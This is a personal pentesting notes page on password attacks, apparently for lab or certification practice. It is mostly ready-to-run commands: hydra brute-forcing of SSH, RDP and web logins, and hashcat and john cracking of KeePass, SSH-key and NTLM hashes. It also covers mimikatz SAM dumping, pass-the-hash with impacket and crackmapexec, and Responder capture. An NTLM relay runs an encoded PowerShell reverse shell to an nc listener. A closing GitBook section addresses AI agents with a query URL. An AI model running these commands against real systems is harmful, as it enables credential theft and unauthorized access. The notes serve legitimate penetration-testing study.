> For the complete documentation index, see [llms.txt](https://ahmed-tarek.gitbook.io/security-notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ahmed-tarek.gitbook.io/security-notes/notes/active-directory-pentesting/password-attacks.md).
# Password Attacks
### Attacking Network Services Logins
```bash
#If we got user name and password we connect using ssh or RDP
#scanning ssh port
sudo nmap -sV -p 2222 192.168.50.201
sudo nmap -sV -p 22 192.168.50.201
sudo hydra -l george -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://192.168.50.201
sudo hydra -L /usr/share/wordlists/dirb/others/names.txt -p "SuperS3cure1337#" rdp://192.168.50.202
#HTTP POST Login Form
sudo hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.50.201 http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid"
```
### Password Cracking Fundamentals
```bash
##Mutating Wordlists
#copying first 10 lines
head /usr/share/wordlists/rockyou.txt > demo.txt
#remove lines starts with "1" in demo password file
sed -i '/^1/d' demo.txt
#demo3.rule file contains below rules
$1 c $!
$2 c $!
$1 $2 $3 c $!
hashcat -m 0 hashes.txt /usr/share/wordlists/rockyou.txt -r demo3.rule --force
#prebuild hashcat rules
ls -la /usr/share/hashcat/rules/
##Cracking Methodology
1. Extract hashes
2. Format hashes (Find hashing also using hash-identifier or hashid or googling)
3. Calculate the cracking time
4. Prepare wordlist
5. Attack the hash
##Password Manager
#locate the keypass databse
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
#transfer file to our kali and crack it
ls -la Database.kdbx
keepass2john Database.kdbx > keepass.hash
cat keepass.hash
hashcat --help | grep -i "KeePass"
hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force
#using the cracked password we can access the keypass
##SSH Private Key Passphrase
#when we got ssh_rsa key and when we try to login, it may ask for passphrase, so we have to crack it
ssh2john id_rsa > ssh.hash
cat ssh.hash
hashcat -h | grep -i "ssh"
#ssh.rule contains below code
c $1 $3 $7 $!
c $1 $3 $7 $@
c $1 $3 $7 $#
#craching ssh hash using hashcat
hashcat -m 22921 ssh.hash ssh.passwords -r ssh.rule --force
#cracking using john
sudo sh -c 'cat /home/kali/passwordattacks/ssh.rule >> /etc/john/john.conf'
john --wordlist=ssh.passwords --rules=sshRules ssh.hash
#after successfully cracking password we can login to ssh
```
### Working with Password Hashes
```bash
##Cracking NTLM
Get-LocalUser
#we will use mimikatz.exe to get stored credentials on the system.
#To run mimikatz.exe, first open powershell as "Run as Administrator", then run below commads
.\mimikatz.exe
privilege::debug
token::elevate
lsadump::sam
#we will get the hashes from above where we can crack those hashes
hashcat --help | grep -i "ntlm"
hashcat -m 1000 nelly.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
#if we crack the hash we can use it in further attacks
##Passing NTLM
#we will use mimikatz.exe to get stored credentials on the system.
#To run mimikatz.exe, first open powershell as "Run as Administrator", then run below commads
.\mimikatz.exe
privilege::debug
token::elevate
lsadump::sam
#we will pass these hashes to another accounts
smbclient \\\\192.168.50.212\\secrets -U Administrator --pw-nt-hash 7a38310ea6f0027ee955abed1762964b
impacket-psexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.50.212
impacket-wmiexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.50.212
crackmapexec smb 192.168.x.x/24 -u "Frank Castle" -H 54vbfgb564bddfb --local-auth
psexec.py "Frank castle"@192.168.x.x -hashes bvsbvf:vfhbvfd
##Cracking Net-NTLMv2
#if you run responder and wait for some time, you may get ntlmv2 hashes
sudo responder -I tap0
#or we can run below as well from victim machine cmd (instead of waiting)
dir \\192.168.119.2\test
#once you have NTLMv2 hashes in any possible way you can try to crack those
hashcat --help | grep -i "ntlm"
hashcat -m 5600 paul.hash /usr/share/wordlists/rockyou.txt --force
##Relaying Net-NTLMv2
#here "-enc" is encoded version of PowerShell reverse shell one-liner(#converting command to base64 in web file upload attacks secton)
sudo impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.212 -c "powershell -enc JABjAGwAaQBlAG4AdA..."
#now start the listerner
nc -nvlp 8080
#if any trigger happens we may get shell in the victim
#or we can run below as well from victim machine cmd (instead of waiting)
dir \\192.168.119.2\test
#via this attack we may get privileged access
```
---
# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.
## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:
```
GET https://ahmed-tarek.gitbook.io/security-notes/notes/active-directory-pentesting/password-attacks.md?ask=&goal=
```
`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.